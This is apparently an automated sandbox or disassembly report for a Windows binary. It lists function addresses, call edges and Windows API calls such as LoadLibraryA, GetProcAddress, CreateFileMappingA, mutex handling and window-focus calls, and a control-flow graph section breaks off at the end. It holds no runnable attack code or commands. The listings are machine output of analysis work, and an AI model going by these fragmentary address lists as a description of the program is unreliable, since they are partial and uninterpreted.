96882->96887 96883->96868 96889 1113925f GetForegroundWindow 96883->96889 97225 1102cff0 294 API calls std::_Mutex::_Mutex 96886->97225 96888 11146450 std::_Mutex::_Mutex 21 API calls 96887->96888 96892 11139183 GetForegroundWindow 96888->96892 97223 11131210 147 API calls 96889->97223 96890 111394ac 96896 111394b4 96890->96896 96897 111394bd 96890->96897 96899 11139192 EnableWindow 96892->96899 96900 111391be 96892->96900 96894->96869 96895 11139334 96894->96895 96902 11081a70 IsDBCSLeadByte 96894->96902 96904 11143230 std::_Mutex::_Mutex 8 API calls 96895->96904 97228 11131b00 89 API calls 2 library calls 96896->97228 96905 111394d4 96897->96905 96906 111394c8 96897->96906 96898 1113946b 96898->96872 97221 11131210 147 API calls 96899->97221 96900->96858 96916 111391ca SetForegroundWindow 96900->96916 96901 1113926e 97224 11131210 147 API calls 96901->97224 96902->96895 96911 11139346 96904->96911 97230 111317a0 299 API calls std::_Mutex::_Mutex 96905->97230 96912 111394d9 96906->96912 97229 11131870 299 API calls std::_Mutex::_Mutex 96906->97229 96910 111394ba 96910->96897 96918 11139353 GetLastError 96911->96918 96930 11139361 96911->96930 96914 111394d2 96912->96914 96915 111395e9 96912->96915 96913 111391a9 97222 11131210 147 API calls 96913->97222 96914->96912 96922 111394f1 96914->96922 96923 1113959b 96914->96923 96924 111386b0 295 API calls 96915->96924 96916->96858 96917 11139275 96925 1113928b EnableWindow 96917->96925 96927 11139284 SetForegroundWindow 96917->96927 96920 11146450 std::_Mutex::_Mutex 21 API calls 96918->96920 96920->96930 96922->96915 96931 1110f420 std::_Mutex::_Mutex 265 API calls 96922->96931 96923->96915 97238 1103f000 68 API calls 96923->97238 96938 111395ee 96924->96938 96925->96868 96926 111391b0 EnableWindow 96926->96900 96927->96925 96929 1113973a std::ios_base::_Tidy 96929->96859 96930->96869 96935 11081a70 IsDBCSLeadByte 96930->96935 96941 111393b2 96930->96941 96936 11139512 96931->96936 96932 111395aa 97239 1103f040 68 API calls 96932->97239 96934 11139615 96934->96929 96940 1105dd10 79 API calls 96934->96940 96935->96941 96942 11139533 96936->96942 97231 110573b0 308 API calls std::_Mutex::_Mutex 96936->97231 96937 11143230 std::_Mutex::_Mutex 8 API calls 96943 111393c4 96937->96943 96938->96934 97137 11142210 96938->97137 96939 111395b5 97240 1103f060 68 API calls 96939->97240 96957 11139645 96940->96957 96941->96937 97232 1110f260 InterlockedIncrement 96942->97232 96943->96869 96946 111393cb GetLastError 96943->96946 96949 11146450 std::_Mutex::_Mutex 21 API calls 96946->96949 96948 111395c0 97241 1103f020 68 API calls 96948->97241 96949->96869 96951 11139558 97233 1104ce00 888 API calls 96951->97233 96954 111395cb 97242 1110f270 InterlockedDecrement 96954->97242 96955 11139563 97234 1104e340 888 API calls 96955->97234 96957->96929 96958 1113968d 96957->96958 96961 1113966a 96957->96961 96962 11139699 GetTickCount 96957->96962 96958->96929 96958->96962 96960 11139599 96960->96915 96964 11146450 std::_Mutex::_Mutex 21 API calls 96961->96964 96962->96929 96965 111396ab 96962->96965 96963 1113956e 97235 1104e3b0 888 API calls 96963->97235 96967 11139675 GetTickCount 96964->96967 96968 11142e80 145 API calls 96965->96968 96967->96929 96969 111396b7 96968->96969 96971 11146ee0 269 API calls 96969->96971 96970 11139579 97236 1104ce40 888 API calls 96970->97236 96973 111396c2 96971->96973 96975 11142e80 145 API calls 96973->96975 96974 11139584 96974->96915 97237 110ebf30 285 API calls 96974->97237 96976 111396d5 96975->96976 97243 11025bb0 LoadLibraryA 96976->97243 96979 111396e2 96979->96979 97244 1112c7a0 GetProcAddress SetLastError 96979->97244 96981 11139729 96981->96929 96982 11139733 FreeLibrary 96981->96982 96982->96929 97245 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 96983->97245 96985 1102933e 96986 11029353 96985->96986 97246 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 96985->97246 97247 11089cc0 269 API calls 2 library calls 96986->97247 96989 1102935e 96989->96852 96991 11133962 96990->96991 96992 11133c84 96990->96992 96994 1105dd10 79 API calls 96991->96994 96993 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96992->96993 96995 11133c9c 96993->96995 96996 11133982 96994->96996 97038 11133400 96995->97038 96996->96992 96997 1113398a GetLocalTime 96996->96997 96998 111339c1 LoadLibraryA 96997->96998 96999 111339a0 96997->96999 97248 110098c0 LoadLibraryA 96998->97248 97000 11146450 std::_Mutex::_Mutex 21 API calls 96999->97000 97002 111339b5 97000->97002 97002->96998 97003 11133a15 97249 11015c30 LoadLibraryA 97003->97249 97005 11133a20 GetCurrentProcess 97006 11133a45 GetProcAddress 97005->97006 97007 11133a5d GetProcessHandleCount 97005->97007 97006->97007 97008 11133a66 SetLastError 97006->97008 97009 11133a6e 97007->97009 97008->97009 97010 11133a92 97009->97010 97011 11133a78 GetProcAddress 97009->97011 97013 11133aa0 GetProcAddress 97010->97013 97014 11133aba 97010->97014 97011->97010 97012 11133ac7 SetLastError 97011->97012 97012->97013 97013->97014 97015 11133ad4 SetLastError 97013->97015 97016 11133adf GetProcAddress 97014->97016 97015->97016 97017 11133af1 K32GetProcessMemoryInfo 97016->97017 97018 11133aff SetLastError 97016->97018 97019 11133b07 97017->97019 97018->97019 97020 11146450 std::_Mutex::_Mutex 21 API calls 97019->97020 97022 11133b7d 97019->97022 97020->97022 97021 11133c5a 97023 11133c6a FreeLibrary 97021->97023 97024 11133c6d 97021->97024 97022->97021 97028 1105dd10 79 API calls 97022->97028 97023->97024 97025 11133c77 FreeLibrary 97024->97025 97026 11133c7a 97024->97026 97025->97026 97026->96992 97027 11133c81 FreeLibrary 97026->97027 97027->96992 97029 11133bce 97028->97029 97030 1105dd10 79 API calls 97029->97030 97031 11133bf6 97030->97031 97032 1105dd10 79 API calls 97031->97032 97033 11133c1d 97032->97033 97034 1105dd10 79 API calls 97033->97034 97035 11133c44 97034->97035 97035->97021 97036 11133c55 97035->97036 97250 11027780 265 API calls 2 library calls 97036->97250 97040 1113342d 97038->97040 97039 111338e9 97039->96858 97039->96859 97141 11138c30 97039->97141 97040->97039 97041 110d1550 268 API calls 97040->97041 97042 1113348e 97041->97042 97043 110d1550 268 API calls 97042->97043 97044 11133499 97043->97044 97045 111334c7 97044->97045 97046 111334de 97044->97046 97251 11029450 265 API calls 2 library calls 97045->97251 97048 11146450 std::_Mutex::_Mutex 21 API calls 97046->97048 97050 111334ec 97048->97050 97252 110d12e0 265 API calls 97050->97252 97138 1114222f 97137->97138 97139 1114221a 97137->97139 97138->96934 97253 11141890 97139->97253 97144 11138c4d 97141->97144 97197 1113906f 97141->97197 97142 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97143 1113907e 97142->97143 97143->96863 97145 111450a0 std::_Mutex::_Mutex 90 API calls 97144->97145 97144->97197 97146 11138c8c 97145->97146 97147 1105dd10 79 API calls 97146->97147 97146->97197 97148 11138cbb 97147->97148 97389 1112c920 97148->97389 97150 11138e00 PostMessageA 97152 11138e15 97150->97152 97151 1105dd10 79 API calls 97153 11138dfc 97151->97153 97154 11138e25 97152->97154 97398 1110f270 InterlockedDecrement 97152->97398 97153->97150 97153->97152 97155 11138e2b 97154->97155 97156 11138e4d 97154->97156 97160 11138e83 std::ios_base::_Tidy 97155->97160 97161 11138e9e 97155->97161 97399 11130410 315 API calls std::_Mutex::_Mutex 97156->97399 97159 11138e55 97400 11146ec0 267 API calls 97159->97400 97167 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97160->97167 97162 11142e80 145 API calls 97161->97162 97165 11138ea3 97162->97165 97168 11146ee0 269 API calls 97165->97168 97166 11138e5f 97401 1112cb20 SetDlgItemTextA 97166->97401 97170 11138e9a 97167->97170 97171 11138eaa SetWindowTextA 97168->97171 97170->96863 97173 11138ec6 97171->97173 97177 11138ecd std::ios_base::_Tidy 97171->97177 97172 11138e70 std::ios_base::_Tidy 97172->97155 97402 111352b0 299 API calls 5 library calls 97173->97402 97174 11145b40 271 API calls 97176 11138dab 97174->97176 97176->97150 97176->97151 97178 11138f24 97177->97178 97185 11138ef7 97177->97185 97403 111352b0 299 API calls 5 library calls 97177->97403 97179 11138ffc 97178->97179 97184 11138f38 97178->97184 97182 1113901d 97179->97182 97187 1113900b 97179->97187 97188 11139004 97179->97188 97181 11138f0c 97404 11131210 147 API calls 97181->97404 97411 110f8640 86 API calls 97182->97411 97183 11138f5c 97407 110f8640 86 API calls 97183->97407 97184->97183 97405 111352b0 299 API calls 5 library calls 97184->97405 97185->97178 97185->97181 97410 11131210 147 API calls 97187->97410 97409 111352b0 299 API calls 5 library calls 97188->97409 97191 11138f67 97191->97197 97198 11138f6f IsWindowVisible 97191->97198 97192 11138f1c 97192->97178 97195 11139028 97195->97197 97200 1113902c IsWindowVisible 97195->97200 97197->97142 97198->97197 97202 11138f86 97198->97202 97199 1113901a 97199->97182 97200->97197 97203 1113903e IsWindowVisible 97200->97203 97201 11138f46 97201->97183 97204 11138f52 97201->97204 97207 111450a0 std::_Mutex::_Mutex 90 API calls 97202->97207 97203->97197 97205 1113904b EnableWindow 97203->97205 97406 11131210 147 API calls 97204->97406 97412 11131210 147 API calls 97205->97412 97210 11138f91 97207->97210 97209 11138f59 97209->97183 97210->97197 97212 11138f9c GetForegroundWindow IsWindowVisible 97210->97212 97211 11139062 EnableWindow 97211->97197 97213 11138fc1 97212->97213 97214 11138fb6 EnableWindow 97212->97214 97408 11131210 147 API calls 97213->97408 97214->97213 97216 11138fc8 97217 11138fde EnableWindow 97216->97217 97219 11138fd7 SetForegroundWindow 97216->97219 97218 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97217->97218 97220 11138ff8 97218->97220 97219->97217 97220->96863 97221->96913 97222->96926 97223->96901 97224->96917 97225->96898 97226->96880 97227->96890 97228->96910 97229->96914 97230->96912 97231->96942 97232->96951 97233->96955 97234->96963 97235->96970 97236->96974 97237->96960 97238->96932 97239->96939 97240->96948 97241->96954 97242->96960 97243->96979 97244->96981 97245->96985 97246->96985 97247->96989 97248->97003 97249->97005 97250->97021 97254 111418cf 97253->97254 97305 111418c8 std::ios_base::_Tidy 97253->97305 97255 1110f420 std::_Mutex::_Mutex 265 API calls 97254->97255 97257 111418d6 97255->97257 97256 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97258 1114220a 97256->97258 97259 11141906 97257->97259 97380 11060f70 301 API calls std::_Mutex::_Mutex 97257->97380 97258->97138 97261 11061700 275 API calls 97259->97261 97262 11141942 97261->97262 97263 11141949 RegCloseKey 97262->97263 97264 11141950 std::_Mutex::_Mutex 97262->97264 97263->97264 97265 11144dc0 267 API calls 97264->97265 97266 1114196c 97265->97266 97267 11143230 std::_Mutex::_Mutex 8 API calls 97266->97267 97268 11141980 97267->97268 97269 11141997 97268->97269 97270 11062d60 330 API calls 97268->97270 97271 1110f420 std::_Mutex::_Mutex 265 API calls 97269->97271 97270->97269 97272 1114199e 97271->97272 97273 111419ba 97272->97273 97381 11060be0 293 API calls std::_Mutex::_Mutex 97272->97381 97275 1110f420 std::_Mutex::_Mutex 265 API calls 97273->97275 97276 111419d3 97275->97276 97277 111419ef 97276->97277 97382 11060be0 293 API calls std::_Mutex::_Mutex 97276->97382 97279 1110f420 std::_Mutex::_Mutex 265 API calls 97277->97279 97280 11141a08 97279->97280 97281 11141a24 97280->97281 97383 11060be0 293 API calls std::_Mutex::_Mutex 97280->97383 97283 11060760 268 API calls 97281->97283 97284 11141a4d 97283->97284 97285 11060760 268 API calls 97284->97285 97303 11141a67 97285->97303 97286 11141d95 97288 110d1550 268 API calls 97286->97288 97289 11142179 97286->97289 97287 110607f0 274 API calls 97287->97303 97290 11141db3 97288->97290 97297 11060640 69 API calls 97289->97297 97295 1105dd10 79 API calls 97290->97295 97291 11141d85 97292 11146450 std::_Mutex::_Mutex 21 API calls 97291->97292 97292->97286 97293 11081bb0 86 API calls 97293->97303 97294 11146450 21 API calls std::_Mutex::_Mutex 97294->97303 97296 11141df0 97295->97296 97299 11141f3d 97296->97299 97300 11060760 268 API calls 97296->97300 97298 111421d2 97297->97298 97301 11060640 69 API calls 97298->97301 97302 11060f40 274 API calls 97299->97302 97304 11141e0e 97300->97304 97301->97305 97306 11141f59 97302->97306 97303->97286 97303->97287 97303->97291 97303->97293 97303->97294 97319 111319f0 86 API calls 97303->97319 97321 11081c60 86 API calls std::_Mutex::_Mutex 97303->97321 97307 110607f0 274 API calls 97304->97307 97305->97256 97384 110679c0 298 API calls std::_Mutex::_Mutex 97306->97384 97308 11141e1d 97307->97308 97309 11141e52 97308->97309 97311 11146450 std::_Mutex::_Mutex 21 API calls 97308->97311 97317 110607f0 274 API calls 97308->97317 97312 11060760 268 API calls 97309->97312 97311->97308 97314 11141e68 97312->97314 97313 11141f83 97315 11141fb3 EnterCriticalSection 97313->97315 97325 11141f87 97313->97325 97318 110607f0 274 API calls 97314->97318 97316 11060420 271 API calls 97315->97316 97320 11141fd0 97316->97320 97317->97308 97331 11141e78 97318->97331 97319->97303 97323 11060f40 274 API calls 97320->97323 97321->97303 97327 11141fe6 97323->97327 97324 11141eb1 97326 11060760 268 API calls 97324->97326 97325->97315 97385 110508e0 365 API calls 4 library calls 97325->97385 97386 110679c0 298 API calls std::_Mutex::_Mutex 97325->97386 97329 11141ec7 97326->97329 97330 11141ffa LeaveCriticalSection 97327->97330 97334 1102a9f0 283 API calls 97327->97334 97328 11146450 std::_Mutex::_Mutex 21 API calls 97328->97331 97333 110607f0 274 API calls 97329->97333 97335 1114204e 97330->97335 97336 1114200e 97330->97336 97331->97324 97331->97328 97337 110607f0 274 API calls 97331->97337 97352 11141ed6 97333->97352 97338 11141ff7 97334->97338 97339 11133400 273 API calls 97335->97339 97336->97335 97340 11146450 std::_Mutex::_Mutex 21 API calls 97336->97340 97337->97331 97338->97330 97342 11142058 97339->97342 97344 1114201c 97340->97344 97341 11141f11 97345 110d1550 268 API calls 97342->97345 97347 1113cc30 311 API calls 97344->97347 97348 11146450 std::_Mutex::_Mutex 21 API calls 97348->97352 97352->97341 97352->97348 97355 110607f0 274 API calls 97352->97355 97355->97352 97380->97259 97381->97273 97382->97277 97383->97281 97384->97313 97385->97325 97386->97325 97391 1112c93c 97389->97391 97390 1112c977 97413 1106b860 298 API calls 97390->97413 97391->97390 97392 1112c964 97391->97392 97394 11146ee0 269 API calls 97392->97394 97396 1112c96f 97394->97396 97395 1112c9c3 97395->97174 97395->97176 97396->97395 97397 11142290 std::_Mutex::_Mutex 265 API calls 97396->97397 97397->97395 97398->97154 97399->97159 97400->97166 97401->97172 97402->97177 97403->97185 97404->97192 97405->97201 97406->97209 97407->97191 97408->97216 97409->97187 97410->97199 97411->97195 97412->97211 97413->97396 97414 11144200 97415 11144211 97414->97415 97428 11143c20 97415->97428 97419 11144295 97422 111442b2 97419->97422 97424 11144294 97419->97424 97420 1114425b 97421 11144262 ResetEvent 97420->97421 97436 11143de0 265 API calls 2 library calls 97421->97436 97424->97419 97437 11143de0 265 API calls 2 library calls 97424->97437 97425 11144276 SetEvent WaitForMultipleObjects 97425->97421 97425->97424 97427 111442af 97427->97422 97429 11143c2c GetCurrentProcess 97428->97429 97430 11143c4f 97428->97430 97429->97430 97431 11143c3d GetModuleFileNameA 97429->97431 97432 1110f420 std::_Mutex::_Mutex 263 API calls 97430->97432 97434 11143c79 WaitForMultipleObjects 97430->97434 97431->97430 97433 11143c6b 97432->97433 97433->97434 97438 11143570 GetModuleFileNameA 97433->97438 97434->97419 97434->97420 97436->97425 97437->97427 97439 111435f3 97438->97439 97440 111435b3 97438->97440 97443 111435ff LoadLibraryA 97439->97443 97444 11143619 GetModuleHandleA GetProcAddress 97439->97444 97441 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 97440->97441 97442 111435c1 97441->97442 97442->97439 97448 111435c8 LoadLibraryA 97442->97448 97443->97444 97445 1114360e LoadLibraryA 97443->97445 97446 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 97444->97446 97447 11143639 97444->97447 97445->97444 97449 11143673 10 API calls 97446->97449 97447->97449 97448->97439 97450 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97449->97450 97451 111436f0 97450->97451 97451->97434 97452 1115bde0 97453 1115bdf4 97452->97453 97454 1115bdec 97452->97454 97464 111631ab 97453->97464 97457 1115be14 97458 1115bf40 97460 11162be5 _free 66 API calls 97458->97460 97461 1115bf68 97460->97461 97462 1115be31 97462->97458 97463 1115bf24 SetLastError 97462->97463 97463->97462 97465 11170166 __calloc_crt 66 API calls 97464->97465 97467 111631c5 97465->97467 97466 1115be08 97466->97457 97466->97458 97471 1115ba20 CoInitializeSecurity CoCreateInstance 97466->97471 97467->97466 97488 111692ef 66 API calls __getptd_noexit 97467->97488 97469 111631d8 97469->97466 97489 111692ef 66 API calls __getptd_noexit 97469->97489 97472 1115ba95 wsprintfW SysAllocString 97471->97472 97473 1115bc14 97471->97473 97478 1115badb 97472->97478 97474 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97473->97474 97476 1115bc40 97474->97476 97475 1115bc01 SysFreeString 97475->97473 97476->97462 97477 1115bbe9 97477->97475 97478->97475 97478->97477 97478->97478 97479 1115bb6c 97478->97479 97480 1115bb5a wsprintfW 97478->97480 97490 110974a0 97479->97490 97480->97479 97482 1115bb7e 97483 110974a0 266 API calls 97482->97483 97484 1115bb93 97483->97484 97495 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 97484->97495 97486 1115bbd7 97496 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 97486->97496 97488->97469 97489->97466 97491 1110f420 std::_Mutex::_Mutex 265 API calls 97490->97491 97492 110974d3 97491->97492 97493 110974e6 SysAllocString 97492->97493 97494 11097504 97492->97494 97493->97494 97494->97482 97495->97486 97496->97477 97497 6c7563a0 97498 6c7563a5 97497->97498 97499 6c7563b1 Sleep 97498->97499 97500 6c7563a9 WSACancelBlockingCall 97498->97500 97501 110304b8 97502 11142a60 267 API calls 97501->97502 97503 110304c6 97502->97503 97504 11142bb0 86 API calls 97503->97504 97505 11030503 97504->97505 97506 11030518 97505->97506 97507 11081bb0 86 API calls 97505->97507 97508 110ed1a0 8 API calls 97506->97508 97507->97506 97509 1103053f 97508->97509 97510 11030589 97509->97510 97573 110ed250 81 API calls 2 library calls 97509->97573 97513 11142bb0 86 API calls 97510->97513 97512 11030554 97574 110ed250 81 API calls 2 library calls 97512->97574 97515 110305a0 97513->97515 97518 1110f420 std::_Mutex::_Mutex 265 API calls 97515->97518 97516 1103056b 97516->97510 97517 111463d0 19 API calls 97516->97517 97517->97510 97519 110305af 97518->97519 97520 110305d0 97519->97520 97575 11088860 268 API calls 97519->97575 97552 1108a470 97520->97552 97523 110305e3 OpenMutexA 97524 11030603 CreateMutexA 97523->97524 97525 1103071a CloseHandle 97523->97525 97526 11030623 97524->97526 97527 1108a570 69 API calls 97525->97527 97528 1110f420 std::_Mutex::_Mutex 265 API calls 97526->97528 97530 11030730 97527->97530 97529 11030638 97528->97529 97531 1103065b 97529->97531 97576 11060be0 293 API calls std::_Mutex::_Mutex 97529->97576 97533 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 97530->97533 97563 11015c30 LoadLibraryA 97531->97563 97534 110310b3 97533->97534 97536 1103066d 97537 111450a0 std::_Mutex::_Mutex 90 API calls 97536->97537 97538 1103067c 97537->97538 97539 11030689 97538->97539 97540 1103069c 97538->97540 97564 11145ae0 97539->97564 97542 110306a6 GetProcAddress 97540->97542 97543 11030690 97540->97543 97542->97543 97544 110306c0 SetLastError 97542->97544 97545 110281a0 47 API calls 97543->97545 97544->97543 97546 110306cd 97545->97546 97577 110092f0 428 API calls std::_Mutex::_Mutex 97546->97577 97548 110306dc 97549 110306f0 WaitForSingleObject 97548->97549 97549->97549 97550 11030702 CloseHandle 97549->97550 97550->97525 97551 11030713 FreeLibrary 97550->97551 97551->97525 97553 1110f420 std::_Mutex::_Mutex 265 API calls 97552->97553 97554 1108a4a7 97553->97554 97555 1108a4c9 InitializeCriticalSection 97554->97555 97557 1110f420 std::_Mutex::_Mutex 265 API calls 97554->97557 97558 1108a52a 97555->97558 97559 1108a4c2 97557->97559 97558->97523 97559->97555 97578 1116219a 66 API calls std::exception::_Copy_str 97559->97578 97561 1108a4f9 97579 111625f1 RaiseException 97561->97579 97563->97536 97565 111450a0 std::_Mutex::_Mutex 90 API calls 97564->97565 97566 11145af2 97565->97566 97567 11145b30 97566->97567 97568 11145af9 LoadLibraryA 97566->97568 97567->97543 97569 11145b2a 97568->97569 97570 11145b0b GetProcAddress 97568->97570 97569->97543 97571 11145b23 FreeLibrary 97570->97571 97572 11145b1b 97570->97572 97571->97569 97572->97571 97573->97512 97574->97516 97575->97520 97576->97531 97577->97548 97578->97561 97579->97555 97580 1116970d 97581 1116971d 97580->97581 97582 11169718 97580->97582 97586 11169617 97581->97586 97598 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 97582->97598 97585 1116972b 97587 11169623 _doexit 97586->97587 97588 11169670 97587->97588 97596 111696c0 _doexit 97587->97596 97599 111694b3 97587->97599 97588->97596 97649 11025e20 97588->97649 97590 11169683 97592 111696a0 97590->97592 97593 11025e20 ___DllMainCRTStartup 7 API calls 97590->97593 97594 111694b3 __CRT_INIT@12 149 API calls 97592->97594 97592->97596 97595 11169697 97593->97595 97594->97596 97597 111694b3 __CRT_INIT@12 149 API calls 97595->97597 97596->97585 97597->97592 97598->97581 97600 111694bf _doexit 97599->97600 97601 111694c7 97600->97601 97602 11169541 97600->97602 97658 1116d4d0 HeapCreate 97601->97658 97604 11169547 97602->97604 97605 111695a2 97602->97605 97610 11169565 97604->97610 97617 111694d0 _doexit 97604->97617 97746 1116d79b 66 API calls _doexit 97604->97746 97606 111695a7 97605->97606 97607 11169600 97605->97607 97609 1116b5fa ___set_flsgetvalue 3 API calls 97606->97609 97607->97617 97752 1116b8fe 79 API calls __freefls@4 97607->97752 97608 111694cc 97608->97617 97659 1116b96c GetModuleHandleW 97608->97659 97615 111695ac 97609->97615 97613 11169579 97610->97613 97747 1117140e 67 API calls _free 97610->97747 97750 1116958c 70 API calls __mtterm 97613->97750 97620 11169dbe __calloc_crt 66 API calls 97615->97620 97616 111694dc __RTC_Initialize 97622 111694e0 97616->97622 97628 111694ec GetCommandLineA 97616->97628 97617->97588 97621 111695b8 97620->97621 97621->97617 97624 111695c4 DecodePointer 97621->97624 97743 1116d4ee HeapDestroy 97622->97743 97623 1116956f 97748 1116b64b 70 API calls _free 97623->97748 97629 111695d9 97624->97629 97627 11169574 97749 1116d4ee HeapDestroy 97627->97749 97684 11176f92 GetEnvironmentStringsW 97628->97684 97632 111695f4 97629->97632 97633 111695dd 97629->97633 97636 11162be5 _free 66 API calls 97632->97636 97751 1116b688 66 API calls 4 library calls 97633->97751 97636->97617 97638 111695e4 GetCurrentThreadId 97638->97617 97640 1116950a 97744 1116b64b 70 API calls _free 97640->97744 97644 1116952a 97644->97617 97745 1117140e 67 API calls _free 97644->97745 97650 1110f7d0 97649->97650 97651 1110f804 ___DllMainCRTStartup 97650->97651 97652 1110f7f1 97650->97652 97653 1110f7dc 97650->97653 97651->97590 97769 1110f720 97652->97769 97653->97651 97655 1110f720 ___DllMainCRTStartup 7 API calls 97653->97655 97657 1110f7e5 97655->97657 97656 1110f7f8 97656->97590 97657->97590 97658->97608 97660 1116b980 97659->97660 97661 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 97659->97661 97753 1116b64b 70 API calls _free 97660->97753 97665 1116b9d3 TlsAlloc 97661->97665 97663 1116b985 97663->97616 97666 1116bae2 97665->97666 97667 1116ba21 TlsSetValue 97665->97667 97666->97616 97667->97666 97668 1116ba32 97667->97668 97754 1116d557 EncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 97668->97754 97670 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 97755 111735c2 InitializeCriticalSectionAndSpinCount 97670->97755 97672 1116ba76 97673 1116badd 97672->97673 97674 1116ba7a DecodePointer 97672->97674 97757 1116b64b 70 API calls _free 97673->97757 97676 1116ba8f 97674->97676 97676->97673 97677 11169dbe __calloc_crt 66 API calls 97676->97677 97678 1116baa5 97677->97678 97678->97673 97679 1116baad DecodePointer 97678->97679 97680 1116babe 97679->97680 97680->97673 97681 1116bac2 97680->97681 97756 1116b688 66 API calls 4 library calls 97681->97756 97683 1116baca GetCurrentThreadId 97683->97666 97685 11176fae WideCharToMultiByte 97684->97685 97686 111694fc 97684->97686 97688 11176fe3 97685->97688 97689 1117701b FreeEnvironmentStringsW 97685->97689 97697 111711c9 GetStartupInfoW 97686->97697 97690 11169d79 __malloc_crt 66 API calls 97688->97690 97689->97686 97691 11176fe9 97690->97691 97691->97689 97692 11176ff1 WideCharToMultiByte 97691->97692 97693 11177003 97692->97693 97694 1117700f FreeEnvironmentStringsW 97692->97694 97695 11162be5 _free 66 API calls 97693->97695 97694->97686 97696 1117700b 97695->97696 97696->97694 97698 11169dbe __calloc_crt 66 API calls 97697->97698 97699 111711e7 97698->97699 97701 11169dbe __calloc_crt 66 API calls 97699->97701 97704 11169506 97699->97704 97705 111712dc 97699->97705 97706 1117135c 97699->97706 97700 11171392 GetStdHandle 97700->97706 97701->97699 97702 111713f6 SetHandleCount 97702->97704 97703 111713a4 GetFileType 97703->97706 97704->97640 97710 11176ed7 97704->97710 97705->97706 97707 11171313 InitializeCriticalSectionAndSpinCount 97705->97707 97708 11171308 GetFileType 97705->97708 97706->97700 97706->97702 97706->97703 97709 111713ca InitializeCriticalSectionAndSpinCount 97706->97709 97707->97704 97707->97705 97708->97705 97708->97707 97709->97704 97709->97706 97711 11176ef1 GetModuleFileNameA 97710->97711 97712 11176eec 97710->97712 97714 11176f18 97711->97714 97764 11170be7 94 API calls __setmbcp 97712->97764 97758 11176d3d 97714->97758 97716 11169516 97716->97644 97721 11176c61 97716->97721 97718 11169d79 __malloc_crt 66 API calls 97719 11176f5a 97718->97719 97719->97716 97720 11176d3d _parse_cmdline 76 API calls 97719->97720 97720->97716 97722 11176c6a 97721->97722 97725 11176c6f _strlen 97721->97725 97766 11170be7 94 API calls __setmbcp 97722->97766 97723 1116951f 97723->97644 97737 1116d5ae 97723->97737 97725->97723 97726 11169dbe __calloc_crt 66 API calls 97725->97726 97727 11176ca4 _strlen 97726->97727 97727->97723 97728 11176cf3 97727->97728 97730 11169dbe __calloc_crt 66 API calls 97727->97730 97731 11176d19 97727->97731 97732 1116be9f _strcpy_s 66 API calls 97727->97732 97734 11176d30 97727->97734 97729 11162be5 _free 66 API calls 97728->97729 97729->97723 97730->97727 97733 11162be5 _free 66 API calls 97731->97733 97732->97727 97733->97723 97735 1116deb2 __invoke_watson 10 API calls 97734->97735 97736 11176d3c 97735->97736 97738 1116d5bc __IsNonwritableInCurrentImage 97737->97738 97767 1116c9cb EncodePointer 97738->97767 97740 1116d5da __initterm_e 97742 1116d5fb __IsNonwritableInCurrentImage 97740->97742 97768 11162f15 76 API calls __cinit 97740->97768 97742->97644 97743->97617 97744->97622 97745->97640 97746->97610 97747->97623 97748->97627 97749->97613 97750->97617 97751->97638 97752->97617 97753->97663 97754->97670 97755->97672 97756->97683 97757->97666 97760 11176d5c 97758->97760 97762 11176dc9 97760->97762 97765 111766ce 76 API calls x_ismbbtype_l 97760->97765 97761 11176ec7 97761->97716 97761->97718 97762->97761 97763 111766ce 76 API calls __splitpath_helper 97762->97763 97763->97762 97764->97711 97765->97760 97766->97725 97767->97740 97768->97742 97770 1110f764 EnterCriticalSection 97769->97770 97771 1110f74f InitializeCriticalSection 97769->97771 97772 1110f785 97770->97772 97771->97770 97773 1110f7b3 LeaveCriticalSection 97772->97773 97774 1110f6c0 ___DllMainCRTStartup 4 API calls 97772->97774 97773->97656 97774->97772

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 725 1109e221-1109e235 LocalAlloc 719->725 726 1109e384-1109e386 719->726 722 1109e812-1109e82d call 11161d01 720->722 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 725->728 729 1109e805-1109e80b call 1109d4d0 725->729 730 1109e316-1109e33b CreateFileMappingA 726->730 731 1109e2fa-1109e310 728->731 732 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->732 729->720 734 1109e388-1109e39b GetLastError 730->734 735 1109e33d-1109e35d GetLastError call 1112ef20 730->735 731->730 762 1109e2e9-1109e2f1 732->762 763 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 732->763 738 1109e39d 734->738 739 1109e3a2-1109e3b9 MapViewOfFile 734->739 744 1109e368-1109e370 735->744 745 1109e35f-1109e366 LocalFree 735->745 738->739 742 1109e3bb-1109e3d6 call 1112ef20 739->742 743 1109e3f7-1109e3ff 739->743 765 1109e3d8-1109e3d9 LocalFree 742->765 766 1109e3db-1109e3e3 742->766 746 1109e4a1-1109e4b3 743->746 747 